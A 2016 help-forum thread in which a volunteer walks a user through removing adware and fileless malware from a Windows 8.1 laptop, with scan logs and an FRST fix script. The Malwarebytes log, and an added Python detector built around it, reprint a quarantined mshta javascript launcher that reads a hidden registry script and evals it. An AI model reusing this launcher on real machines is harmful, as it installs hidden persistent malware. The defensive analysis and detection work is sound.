sent from Windows 8.1 Forum

Old 11-01-2016, 01:39 PM   #1
Registered Member
 
Join Date: Mar 2007
Location: 60 Mi South of Seattle
Posts: 170
OS: i7 Quad core, 8GB DDR3, 1Tb SATA, Win 7 64 Bit



HP Envy 15" DV7 Started about a month ago...and I'm almost certain it followed a Windows Update.
I have this computer set to download but ask me what updates to install...I didn't want any part of Windows 10.
(Considering the cost of every Windows Operating System since the beginning, the fact they were giving it away for free should have caused some questions in anyone's mind)

But I digress.

No matter where I set volume...almost immediately the MUTE light comes on over the f6 key which is "mute"...I turn the volume back up, and poof...muted again.
Playing something with sound is not required to make it drop to MUTE.
It will happen, on its own, anywhere from 30 seconds to five minutes later but it IS going to happen every time.

There are a few "solutions" out there. Mostly involving going through Device Manager, opening the sound and then unchecking "allow programs to control this device" or something like that...doesn't matter...changes nothing.
There is no "adjustment" I can make to fix this.

If Microsatan came up with a patch to fix it, it's not been downloaded to my computer yet.

None of the "fixes" I've seen online fix anything.

The person who answered on the other board said...malware.
Malwarebytes sees nothing. Chameleon sees nothing. Stumped.
grumpops is offline  
Old 11-01-2016, 07:14 PM   #2



This is Win 8.1 and DDS/Combo Fix won't run on it.
"this program not designed to run in Compatibility mode"
But nothing is in compatibility mode.

Went looking and found that neither program (only trying to run DDS of course) will work on an 8.1 machine.
grumpops is offline  
Old 11-02-2016, 01:19 PM   #3



Are there other alternatives to DDS or something that will run on 8.1?
grumpops is offline  
Old 11-04-2016, 02:17 AM   #4
Security Team
Analyst
 
tekir06's Avatar
 
Join Date: Oct 2010
Location: Turkiye
Posts: 1,859
OS: Windows 7 (32 Bit)



Hello grumpops,

My name is Tolga and I will assist you with your malware related problems.

Before we move on, please read the following points carefully.

If you haven't already, please Subscribe to this Thread to get immediate notification of replies as soon as they are posted. To do this click Thread Tools, then click Subscribe to this Thread. Make sure it is set to Instant notification by email, then click Add Subscription.
First, read my instructions completely. If there is anything that you do not understand kindly ask before proceeding.
Please download and run all requested tools from your Desktop.
Perform everything in the correct order. Sometimes one step requires the previous one.
If you have any problems while following my instructions, Stop there and tell me the exact nature of your problem.
Do not run any other scans without instruction or add/remove software unless I tell you to do so. This would change the output of our tools and could be confusing for me.
Post all logfiles as a reply rather than as an attachment unless I specifically ask you. If you can not post all logfiles in one reply, feel free to use more posts.
If I don't hear from you within 3 days from this initial or any subsequent post, then this thread will be closed.
Stay with me. I will give you some advice about prevention after the cleanup process. Absence of symptoms does not always mean the computer is clean.
My native language is not English. So please do not use slang or idioms. It could be hard for me to read. Thanks for your understanding.

Now, let's get started, shall we? Please do the below steps.

STEP 1

Please download AdwCleaner from here and save it to your desktop.

Click the green 'Download now @bleepingcomputer' button.
Run AdwCleaner and select Scan
Once the Scan is done, select Clean
Once done it will ask to reboot, please allow the reboot.
On reboot, a log will be produced. It can also be found at C:\AdwCleaner\AdwCleaner[C#].txt
Please copy/paste the contents of the log in your next reply.

STEP 2

Please download Farbar Recovery Scan Tool and save it to your desktop.

Note: You need to run the version compatible with your system.
If you are not sure which version applies to your system download both of them and try to run them.
Only one of them will run on your system, that will be the right version.


Double-click to run it. When the tool opens click Yes to the disclaimer.
Make sure the Addition.txt button is ticked.
Press Scan button.
It will make a log (FRST.txt) in the same directory the tool is run. Please attach it to your reply.
The first time the tool is run, it also makes another log (Addition.txt). Please attach it to your reply.

=========================================================

Things I need to see in your next post:

  • AdwCleaner[C#].txt
  • FRST.txt
  • Addition.txt
tekir06 is offline  
Old 11-18-2016, 09:50 AM   #5



I've been Away a few weeks. Will run these today
grumpops is offline  
Old 11-18-2016, 10:36 AM   #6



Ran the scans.
Odd that AdwCleaner says it's part of Malwarebytes, but Malwarebytes didn't see what AdwCleaner did.

Here are the logs.
FRST and ADDITION attached.
The contents of the Adwcleaner scan:

# AdwCleaner v6.030 - Logfile created 18/11/2016 at 0952
# Updated on 19/10/2016 by Malwarebytes
# Database : 2016-11-18.1 [Server]
# Operating System : Windows 8.1 (X64)
# Username : Sal - SALMUSIC
# Running from : C:\Users\Sal\Desktop\AdwCleaner.exe
# Mode: Clean
# Support : hxxps://www.malwarebytes.com/support



***** [ Services ] *****



***** [ Folders ] *****

[-] Folder deleted: C:\Program Files (x86)\deal4real
[-] Folder deleted: C:\ProgramData\Savinshoop
[#] Folder deleted on reboot: C:\ProgramData\Application Data\Savinshoop
[-] Folder deleted: C:\Program Files (x86)\Savinshoop
[-] Folder deleted: C:\ProgramData\surefkeepIt
[#] Folder deleted on reboot: C:\ProgramData\Application Data\surefkeepIt
[-] Folder deleted: C:\Program Files (x86)\surefkeepIt
[-] Folder deleted: C:\ProgramData\websaavEr
[#] Folder deleted on reboot: C:\ProgramData\Application Data\websaavEr
[-] Folder deleted: C:\Program Files (x86)\websaavEr
[-] Folder deleted: C:\ProgramData\FLoeixiBleeSHopper
[#] Folder deleted on reboot: C:\ProgramData\Savinshoop
[#] Folder deleted on reboot: C:\ProgramData\surefkeepIt
[#] Folder deleted on reboot: C:\ProgramData\websaavEr
[-] Folder deleted: C:\Users\Sal\AppData\Local\Downloaded Installers
[-] Folder deleted: C:\ProgramData\slimware utilities inc
[#] Folder deleted on reboot: C:\ProgramData\SlimWare Utilities Inc
[#] Folder deleted on reboot: C:\ProgramData\Application Data\slimware utilities inc
[#] Folder deleted on reboot: C:\ProgramData\Application Data\SlimWare Utilities Inc
[-] Folder deleted: C:\Users\Public\Documents\Downloaded Installers
[-] Folder deleted: C:\Program Files (x86)\driverupdate
[#] Folder deleted on reboot: C:\Program Files (x86)\DriverUpdate


***** [ Files ] *****

[-] File deleted: C:\Users\Sal\AppData\Local\Microsoft\Internet Explorer\DOMStore\ZQ7HR435\mywebface[1].xml
[-] File deleted: C:\Users\Sal\AppData\Local\Microsoft\Internet Explorer\DOMStore\PY8A573L\pt.gamingwonderland[1].xml
[-] File deleted: C:\Users\Sal\AppData\Local\Microsoft\Internet Explorer\DOMStore\OFW6FLM8\gamingwonderland[1].xml
[-] File deleted: C:\Users\Sal\AppData\Local\Microsoft\Internet Explorer\DOMStore\OFW6FLM8\myway[1].xml
[-] File deleted: C:\Users\Sal\AppData\Local\Microsoft\Internet Explorer\DOMStore\G3ZSKGLT\iwon[1].xml
[-] File deleted: C:\Users\Sal\AppData\Local\Microsoft\Internet Explorer\DOMStore\G3ZSKGLT\www.zwinky[1].xml
[-] File deleted: C:\Users\Sal\AppData\Local\Microsoft\Internet Explorer\DOMStore\92RX7NS0\citysearch[1].xml
[-] File deleted: C:\Users\Sal\AppData\Local\Microsoft\Internet Explorer\DOMStore\92RX7NS0\www.astrology[1].xml
[-] File deleted: C:\Users\Sal\AppData\Local\Microsoft\Internet Explorer\DOMStore\8TAGHT51\www.fromdoctopdf[1].xml
[-] File deleted: C:\Users\Sal\AppData\Roaming\appdataFr2.bin
[-] File deleted: C:\Users\Sal\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_ogminpmldncgcmokldnmmapddoccmhfl_0.localstorage
[-] File deleted: C:\Users\Sal\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_ogminpmldncgcmokldnmmapddoccmhfl_0.localstorage-journal


***** [ DLL ] *****



***** [ WMI ] *****



***** [ Shortcuts ] *****



***** [ Scheduled Tasks ] *****



***** [ Registry ] *****

[-] Key deleted: HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}
[-] Key deleted: HKCU\Software\Microsoft\Internet Explorer\DOMStorage\astrology.com
[-] Key deleted: HKCU\Software\Microsoft\Internet Explorer\DOMStorage\citysearch.com
[-] Key deleted: HKCU\Software\Microsoft\Internet Explorer\DOMStorage\fromdoctopdf.com
[-] Key deleted: HKCU\Software\Microsoft\Internet Explorer\DOMStorage\gamingwonderland.com
[-] Key deleted: HKCU\Software\Microsoft\Internet Explorer\DOMStorage\iwon.com
[-] Key deleted: HKCU\Software\Microsoft\Internet Explorer\DOMStorage\myway.com
[-] Key deleted: HKCU\Software\Microsoft\Internet Explorer\DOMStorage\mywebface.com
[-] Key deleted: HKCU\Software\Microsoft\Internet Explorer\DOMStorage\Astrology.com - Horoscopes, Tarot, Psychic Readings
[-] Key deleted: HKCU\Software\Microsoft\Internet Explorer\DOMStorage\zwinky.com
[-] Key deleted: HKLM\SOFTWARE\Classes\CLSID\{3C99BB60-C534-2DE2-B8DB-8A4EAB415BA9}
[#] Key deleted on reboot: HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID\{3C99BB60-C534-2DE2-B8DB-8A4EAB415BA9}
[-] Key deleted: HKLM\SOFTWARE\Classes\saVinshOp.saVinshOp
[-] Key deleted: HKLM\SOFTWARE\Classes\saVinshOp.saVinshOp.2.3
[-] Key deleted: HKLM\SOFTWARE\Classes\CLSID\{46cae59d-eb46-44e3-997a-a1bdaecba464}
[#] Key deleted on reboot: HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID\{46cae59d-eb46-44e3-997a-a1bdaecba464}
[-] Key deleted: HKLM\SOFTWARE\Classes\.
[-] Key deleted: HKLM\SOFTWARE\Classes\..9
[-] Key deleted: HKLM\SOFTWARE\Classes\CLSID\{C6FCA84D-A21F-B5AE-13B0-30F9F066FBDE}
[#] Key deleted on reboot: HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID\{C6FCA84D-A21F-B5AE-13B0-30F9F066FBDE}
[-] Key deleted: HKLM\SOFTWARE\Classes\surfkEepiit.surfkEepiit
[-] Key deleted: HKLM\SOFTWARE\Classes\surfkEepiit.surfkEepiit.8.1
[-] Key deleted: HKLM\SOFTWARE\Classes\CLSID\{E751B8A7-E516-DDEA-DAF1-97BFB88312D2}
[#] Key deleted on reboot: HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID\{E751B8A7-E516-DDEA-DAF1-97BFB88312D2}
[-] Key deleted: HKLM\SOFTWARE\Classes\wwebsavveRR.wwebsavveRR
[-] Key deleted: HKLM\SOFTWARE\Classes\wwebsavveRR.wwebsavveRR.6.2
[-] Key deleted: HKU\.DEFAULT\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}
[-] Key deleted: HKU\S-1-5-19\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}
[-] Key deleted: HKU\S-1-5-20\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}
[-] Key deleted: HKU\S-1-5-21-247796325-2175392743-1638911745-1001\Software\SlimWare Utilities Inc
[#] Key deleted on reboot: HKU\S-1-5-21-247796325-2175392743-1638911745-1001\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}
[#] Key deleted on reboot: HKU\S-1-5-18\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}
[#] Key deleted on reboot: HKCU\Software\SlimWare Utilities Inc
[#] Key deleted on reboot: HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}
[-] Key deleted: HKLM\SOFTWARE\SLIMWARE UTILITIES, INC.
[-] Key deleted: HKLM\SOFTWARE\{3A7D3E19-1B79-4E4E-BD96-5467DA2C4EF0}
[-] Key deleted: HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}
[-] Key deleted: HKLM\SOFTWARE\{77D46E27-0E41-4478-87A6-AABE6FBCF252}
[-] Key deleted: HKLM\SOFTWARE\SlimWare Utilities Inc
[-] Key deleted: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{2FA77785-00C3-A920-6452-D4FE5C9C129F}
[-] Key deleted: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{594FD08C-0622-F9B8-CB02-7C1355D33CB8}
[-] Key deleted: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{70BD2558-27DA-8B02-02D0-D8704ECD2EDF}
[#] Key deleted on reboot: [x64] HKCU\Software\SlimWare Utilities Inc
[#] Key deleted on reboot: [x64] HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}
[-] Key deleted: HKCU\Software\Microsoft\Internet Explorer\DOMStorage\4yendex.com
[-] Key deleted: HKCU\Software\Microsoft\Internet Explorer\DOMStorage\azlyrics.com
[-] Key deleted: HKCU\Software\Microsoft\Internet Explorer\DOMStorage\babylonbee.com
[#] Key deleted on reboot: [x64] HKCU\Software\Microsoft\Internet Explorer\DOMStorage\4yendex.com
[#] Key deleted on reboot: [x64] HKCU\Software\Microsoft\Internet Explorer\DOMStorage\azlyrics.com
[#] Key deleted on reboot: [x64] HKCU\Software\Microsoft\Internet Explorer\DOMStorage\babylonbee.com


***** [ Web browsers ] *****

[-] [C:\Users\Sal\AppData\Local\Google\Chrome\User Data\Default\Web data] [Search Provider] Deleted: aol.com
[-] [C:\Users\Sal\AppData\Local\Google\Chrome\User Data\Default\Web data] [Search Provider] Deleted: ask.com
[-] [C:\Users\Sal\AppData\Local\Google\Chrome\User Data\Default] [extension] Deleted: mallpejgeafdahhflmliiahjdpgbegpk
[-] [C:\Users\Sal\AppData\Local\Google\Chrome\User Data\Default] [extension] Deleted: ogminpmldncgcmokldnmmapddoccmhfl


*************************

:: "Tracing" keys deleted
:: Winsock settings cleared

*************************

C:\AdwCleaner\AdwCleaner[C0].txt - [8284 Bytes] - [18/11/2016 0952]
C:\AdwCleaner\AdwCleaner[S0].txt - [7918 Bytes] - [18/11/2016 09:05:24]

########## EOF - C:\AdwCleaner\AdwCleaner[C0].txt - [8430 Bytes] ##########
Attached Files
File Type: txt FRST.txt (33.4 KB, 13 views)
File Type: txt Addition.txt (48.8 KB, 12 views)
grumpops is offline  
Old 11-21-2016, 03:58 AM   #7



Hello grumpops,

Your Chrome browser has been changed into the Development Build. This greatly lowers the security of the browser and allows malware to install any extension it pleases. We need to resolve this.

1. If you have bookmarks, let's save them by exporting them - Export Bookmarks
2. Then I need you to go Google Sync and sign into your account
3. Scroll down until you see the "Stop and Clear" button and click on the button. At the prompt click on "Ok"
4. Now we need to uninstall Chrome via the Control Panel.
Note: When asked about user data or settings you must remove this also, so please check the box.
5. Restart the computer and reinstall Chrome. You can download the latest version from here - Google Chrome
6. Import your bookmarks back into Chrome.
7. Sign back in to your Chrome browser so that your bookmarks sync with your online account.

Please let me know when this is complete.
tekir06 is offline  
Old 11-21-2016, 09:33 AM   #8



Chrome not that important.
So rather than do all that I just uninstalled it.
Much faster and I really don't need Chrome.

I have Safari, IE, and Firefox on here.
grumpops is offline  
Old 11-21-2016, 10:08 AM   #9



I took too long and couldn't add this (Edit dies after 15 minutes).
I ran the scans again after removing Chrome.

# AdwCleaner v6.030 - Logfile created 21/11/2016 at 09:42:55
# Updated on 19/10/2016 by Malwarebytes
# Database : 2016-11-20.1 [Server]
# Operating System : Windows 8.1 (X64)
# Username : Sal - SALMUSIC
# Running from : C:\Users\Sal\Desktop\AdwCleaner.exe
# Mode: Scan
# Support : https://www.malwarebytes.com/support



***** [ Services ] *****

No malicious services found.


***** [ Folders ] *****

No malicious folders found.


***** [ Files ] *****

File Found: C:\Users\Sal\AppData\Local\Microsoft\Internet Explorer\DOMStore\OFW6FLM8\myway[1].xml


***** [ DLL ] *****

No malicious DLLs found.


***** [ WMI ] *****

No malicious keys found.


***** [ Shortcuts ] *****

No infected shortcut found.


***** [ Scheduled Tasks ] *****

No malicious task found.


***** [ Registry ] *****

No malicious registry entries found.


***** [ Web browsers ] *****

No malicious Firefox based browser items found.
No malicious Chromium based browser items found.

*************************

C:\AdwCleaner\AdwCleaner[C0].txt - [8529 Bytes] - [18/11/2016 0952]
C:\AdwCleaner\AdwCleaner[S0].txt - [7918 Bytes] - [18/11/2016 09:05:24]
C:\AdwCleaner\AdwCleaner[S1].txt - [1195 Bytes] - [21/11/2016 09:42:55]

########## EOF - C:\AdwCleaner\AdwCleaner[S1].txt - [1268 Bytes] ##########
Attached Files
File Type: txt Addition 1.txt (46.0 KB, 11 views)
File Type: txt FRST.txt (30.8 KB, 10 views)
grumpops is offline  
Old 11-22-2016, 12:12 AM   #10



Hello grumpops,

Ok. Please do the following.

Open Notepad (Start > All Programs > Accessories > Notepad).
Please copy all the text in the codebox below. (To do this highlight the contents of the box, right-click on it and select Copy. Right-click in the open Notepad and select Paste).
Save it as fixlist.txt next to FRST.exe

NOTE: Both FRST64.exe and the fixlist.txt must be in the same location or the fix will not work.

Code:
CreateRestorePoint:
HKLM-x32\...\Run: [] => [X]
CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION
Toolbar: HKU\S-1-5-21-247796325-2175392743-1638911745-1001 -> No Name - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} -  No File
RemoveProxy:
CMD: bitsadmin /reset /allusers
EmptyTemp:

Double-click FRST to run the tool. If the tool warns you the version is outdated, please download and run the updated version.
Click the Fix button just once, and wait.
If you receive a message that a reboot is required, please make sure you allow it to restart normally.
The tool will complete its run after the restart.
When finished, the tool will make a log (Fixlog.txt) in the same location from where it was run. Please post the Fixlog.txt log in your reply.


NOTE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system
tekir06 is offline  
Old 11-22-2016, 10:50 AM   #11



Here's the Fixlog.
System still runs very slow and the sound still mutes before playing any sound.

Fix result of Farbar Recovery Scan Tool (x64) Version: 20-11-2016 01
Ran by Sal (22-11-2016 10:12:22) Run:1
Running from C:\Users\Sal\Desktop\Virus logs
Loaded Profiles: Sal (Available Profiles: Sal)
Boot Mode: Normal
==============================================

fixlist content:
*****************
CreateRestorePoint:
HKLM-x32\...\Run: [] => [X]
CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION
Toolbar: HKU\S-1-5-21-247796325-2175392743-1638911745-1001 -> No Name - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - No File
RemoveProxy:
CMD: bitsadmin /reset /allusers
EmptyTemp:
*****************

Restore point was successfully created.
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\ => value removed successfully
"HKLM\SOFTWARE\Policies\Google" => key removed successfully
HKU\S-1-5-21-247796325-2175392743-1638911745-1001\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} => value removed successfully
HKCR\CLSID\{7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} => key not found.

========= RemoveProxy: =========

HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => value removed successfully
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => value removed successfully
HKU\S-1-5-21-247796325-2175392743-1638911745-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => value removed successfully
HKU\S-1-5-21-247796325-2175392743-1638911745-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => value removed successfully


========= End of RemoveProxy: =========


========= bitsadmin /reset /allusers =========


BITSADMIN version 3.0 [ 7.7.9600 ]
BITS administration utility.
(C) Copyright 2000-2006 Microsoft Corp.

BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows.
Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets.

0 out of 0 jobs canceled.

========= End of CMD: =========


=========== EmptyTemp: ==========

BITS transfer queue => 8388608 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 133042806 B
Java, Flash, Steam htmlcache => 47570 B
Windows/system/drivers => 372281647 B
Edge => 0 B
Chrome => 0 B
Firefox => 377420875 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Default => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 81062 B
systemprofile32 => 128 B
LocalService => 677842 B
NetworkService => 110216 B
Sal => 1854192113 B

RecycleBin => 33377960168 B
EmptyTemp: => 33.6 GB temporary data Removed.

================================


The system needed a reboot.

==== End of Fixlog 10:30:32 ====
grumpops is offline  
Old 11-22-2016, 02:55 PM   #12



I also ran Malwarebytes again and this time, it found two rootkits and a Trojan.
Malwarebytes Anti-Malware
www.malwarebytes.org

Scan Date: 11/22/2016
Scan Time: 1:26 PM
Logfile:
Administrator: Yes

Version: 2.2.1.1043
Malware Database: v2016.11.22.13
Rootkit Database: v2016.11.20.01
License: Premium
Malware Protection: Enabled
Malicious Website Protection: Enabled
Self-protection: Disabled

OS: Windows 8.1
CPU: x64
File System: NTFS
User: Sal

Scan Type: Threat Scan
Result: Completed
Objects Scanned: 326170
Time Elapsed: 1 hr, 20 min, 22 sec

Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Enabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled

Processes: 0
(No malicious items detected)

Modules: 0
(No malicious items detected)

Registry Keys: 1
Rootkit.Fileless.MTGen, HKU\S-1-5-21-247796325-2175392743-1638911745-1001_Classes\5FA8EB45\SHELL\OPEN\COMMAND, Quarantined, [e570a61d3e5c93a3bfa9ac2f2cd6ec14],

Registry Values: 2
Trojan.Fileless.MTGen, HKU\S-1-5-21-247796325-2175392743-1638911745-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|^rsifhfegrs, Quarantined, [d28360636d2dad890960e9f43bc7d32d],
Rootkit.Fileless.MTGen, HKU\S-1-5-21-247796325-2175392743-1638911745-1001_Classes\5fa8eb45\SHELL\OPEN\COMMAND, "C:\WINDOWS\system32\mshta.exe" "javascript:FSaPhuR6="m7SehM";G16Z=new ActiveXObject("WScript.Shell");IBt88ep="tk8";Um0Et6=G16Z.RegRead("HKCU\\software\\pkrixidtpk\\slobryn");wclv3s5q="a7";eval(Um0Et6);n8lQW="ftH";", Quarantined, [e570a61d3e5c93a3bfa9ac2f2cd6ec14]

Registry Data: 0
(No malicious items detected)

Folders: 0
(No malicious items detected)

Files: 1
Rootkit.Fileless.MTGen, C:\Users\Sal\AppData\Local\e99d7f6e\eb9f040c.bat, Quarantined, [69ecd5ee61396dc9af351b7c5ea507f9],

Physical Sectors: 0
(No malicious items detected)


(end)
grumpops is offline  
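The mshta.exe entry in the Malwarebytes log above is the security-relevant finding: the autorun holds no script file, only a one-line launcher that instantiates WScript.Shell, reads the real script out of a registry value with RegRead() and eval()s it, a pattern that file-oriented scanners can miss. Added example, not code from the thread or from Malwarebytes: a small Python detector that parses Malwarebytes-style registry detection lines (the line format is inferred from the posted log and is an assumption) and scores each autorun command line for this fileless pattern; the sample log excerpt is constructed from the lines posted here.

```python
"""
Detector for the fileless registry persistence quarantined in this thread: an
autorun command line that starts mshta.exe with an inline javascript: payload,
reads the real script from a registry value with RegRead() and eval()s it, so
no script file exists on disk for a file scanner to find.
"""
import re
from dataclasses import dataclass, field

# Script hosts that will execute a payload handed to them on the command line.
SCRIPT_HOSTS = ("mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe")
SCRIPT_PROTOCOLS = ("javascript:", "vbscript:", "about:")

ACTIVEX_RE = re.compile(r'ActiveXObject\(\s*"([^"]+)"\s*\)', re.IGNORECASE)
REGREAD_RE = re.compile(r'RegRead\(\s*"([^"]+)"\s*\)', re.IGNORECASE)
EVAL_RE = re.compile(r'\b(?:eval|execScript|Function)\s*\(', re.IGNORECASE)
HEX_CLASS_RE = re.compile(r'\\[0-9a-f]{8}\\', re.IGNORECASE)  # e.g. ...\5fa8eb45\...

# Malwarebytes 2.x registry detection line; format inferred from the posted log
# (assumption):  <detection>, <registry path>[, <data>], <action>, [<32-hex id>][,]
MBAM_REG_RE = re.compile(
    r'^(?P<det>[^,]+), (?P<key>[^,]+)(?:, (?P<data>.*))?, '
    r'(?P<action>Quarantined|Delete-on-reboot|No Action By User), '
    r'\[(?P<hash>[0-9a-f]{32})\],?$'
)


@dataclass
class Finding:
    key: str
    host: str
    indicators: list = field(default_factory=list)
    stage2_keys: list = field(default_factory=list)  # registry values the payload reads

    @property
    def score(self) -> int:
        return len(self.indicators)


def analyze_autorun(key: str, data: str):
    """Return a Finding when an autorun entry looks like fileless script-host
    persistence, else None. Two independent indicators are required so that
    ordinary script-host use (a logon .vbs, a scheduled .ps1) is not reported."""
    lower = data.lower()
    host = next((h for h in SCRIPT_HOSTS if h in lower), None)
    if host is None:
        return None
    f = Finding(key=key, host=host)
    if any(p in lower for p in SCRIPT_PROTOCOLS):
        f.indicators.append("inline script passed through a protocol handler")
    m = ACTIVEX_RE.search(data)
    if m:
        f.indicators.append(f"instantiates ActiveXObject({m.group(1)})")
    for m in REGREAD_RE.finditer(data):
        f.stage2_keys.append(m.group(1).replace("\\\\", "\\"))  # undo JS string escaping
    if f.stage2_keys:
        f.indicators.append("second-stage script read from the registry")
    if EVAL_RE.search(data):
        f.indicators.append("dynamic evaluation of the retrieved script")
    if HEX_CLASS_RE.search(key):
        f.indicators.append("random 8-hex-digit class name in the registry path")
    return f if f.score >= 2 else None


def parse_mbam_registry_lines(log_text: str):
    """Yield (registry path, data) from Malwarebytes registry detection lines."""
    for line in log_text.splitlines():
        m = MBAM_REG_RE.match(line.strip())
        if m:
            yield m.group("key"), m.group("data") or ""


def scan_mbam_log(log_text: str):
    """Run analyze_autorun over every registry detection in a Malwarebytes log."""
    return [f for key, data in parse_mbam_registry_lines(log_text)
            if (f := analyze_autorun(key, data)) is not None]


# Constructed excerpt modelled on the Malwarebytes log posted in this thread;
# the mshta command line is the one quarantined there.
SAMPLE_MBAM_LOG = r'''
Registry Keys: 1
Rootkit.Fileless.MTGen, HKU\S-1-5-21-247796325-2175392743-1638911745-1001_Classes\5FA8EB45\SHELL\OPEN\COMMAND, Quarantined, [e570a61d3e5c93a3bfa9ac2f2cd6ec14],

Registry Values: 2
Trojan.Fileless.MTGen, HKU\S-1-5-21-247796325-2175392743-1638911745-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|^rsifhfegrs, Quarantined, [d28360636d2dad890960e9f43bc7d32d],
Rootkit.Fileless.MTGen, HKU\S-1-5-21-247796325-2175392743-1638911745-1001_Classes\5fa8eb45\SHELL\OPEN\COMMAND, "C:\WINDOWS\system32\mshta.exe" "javascript:FSaPhuR6="m7SehM";G16Z=new ActiveXObject("WScript.Shell");IBt88ep="tk8";Um0Et6=G16Z.RegRead("HKCU\\software\\pkrixidtpk\\slobryn");wclv3s5q="a7";eval(Um0Et6);n8lQW="ftH";", Quarantined, [e570a61d3e5c93a3bfa9ac2f2cd6ec14]
'''

if __name__ == "__main__":
    for f in scan_mbam_log(SAMPLE_MBAM_LOG):
        print(f"{f.host} launched from {f.key} (score {f.score})")
        for i in f.indicators:
            print("  -", i)
        for k in f.stage2_keys:
            print("  second-stage script stored at:", k)
```

The reported stage2_keys value is the registry location a responder would also need to clear; quarantining only the launcher leaves the encoded script behind.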
Old 11-22-2016, 06:37 PM   #13



One last note.
After running Malwarebytes Premium one last time (the log above), the sound issue appears to be gone...I can play a video all the way through.
However, it's still very slow...and there are times when I just get the cursor "hand" and can't do anything for 30 seconds to a minute.
When typing, it will lose the characters...I can continue typing. Eventually it will appear on the screen.
grumpops is offline  
Old 11-24-2016, 11:04 PM   #14



Hello grumpops,

Ok. Please do the following.

Go here and click 'SCAN NOW' under 'ESET Online Scanner' to check for remnants.

You will be prompted to download and install esetonlinescanner_enu.exe. Click on the link and save the file to a convenient location.
Double-click on esetonlinescanner_enu.exe to install and a new window will open. Follow the prompts.
Turn off the real-time scanner of any existing antivirus program before performing the online scan. Here's how
At the bottom of the Terms of use window, tick the option Download latest version of ESET Online Scanner then click Accept
When/if prompted by UAC, 'Do you want to allow this app to make changes to your PC?', please choose Yes
Tick the option Enable detection of potentially unwanted applications
Click on Advanced settings
Make sure that the option Clean threats automatically is unticked.
Ensure these options are ticked:
  • Enable detection of potentially unsafe applications
  • Enable detection of suspicious applications
  • Scan archives
  • Enable Anti-Stealth technology

Click Scan
Wait for the scan to finish.
When the scan is done, if it shows a screen that says Threats found, click Save to text file... then name it and save it to your desktop.
Do NOT be alarmed by what you see in the report. Many of the finds have likely been quarantined.
Please copy/paste the contents of the log in your next reply.
To close ESET Online Scanner, select Do not clean then Finish
tekir06 is offline  
Old 11-26-2016, 11:22 AM   #15



ESET ran for 7 hours, found nothing, and offered no file to save.
At this point the computer is headed to a landfill.
All I can use it for is a doorstop. This post has taken 20 minutes to type; nothing happens when I type.
grumpops is offline  
Old 11-27-2016, 09:09 AM   #16



Everything is just SLOW. For example, click on this box to type.
The cursor will appear, eventually...but when I start to type nothing happens...I typed this entire line seeing nothing on the screen...it appeared about 20 seconds later.
grumpops is offline  
Old 11-28-2016, 03:09 AM   #17



Hello again,

Please re-run FRST tool and attach fresh FRST.txt and Addition.txt.
tekir06 is offline  
Old 11-28-2016, 02:10 PM   #18



Thank you
I've attached, per your request, both the FRST.TXT and ADDITION logs.
Attached Files
File Type: txt FRST 11 28.txt (31.4 KB, 12 views)
File Type: txt Addition 11 28.txt (47.9 KB, 13 views)
grumpops is offline  
Old 11-30-2016, 12:57 AM   #19



Hello grumpops,

Please do the following.

Download CKScanner by askey127 from Here
Right-click and Run as Administrator CKScanner.exe then click Search For Files
After a couple minutes or less, when some text appears in the box, click Save List To File.
A message box will verify the file saved. It is important that you run the program just once.
Double-click the CKFiles.txt icon on your desktop, give permission if asked, and copy/paste the contents in your next reply.
tekir06 is offline  
Old 11-30-2016, 02:07 PM   #20



CKScanner 2.5 - Additional Security Risks - These are not necessarily bad
c:\program files\presonus\studio one 2\extensions\fatchannel\presets\drum\snare crackalak.dsppreset
c:\program files\presonus\studio one 3\presets\presonus\fat channel\drum\snare crackalak.dsppreset
c:\users\sal\documents\presonus\audioboxvsl\library\ab44\fat\drm_snarecrackalak.xml
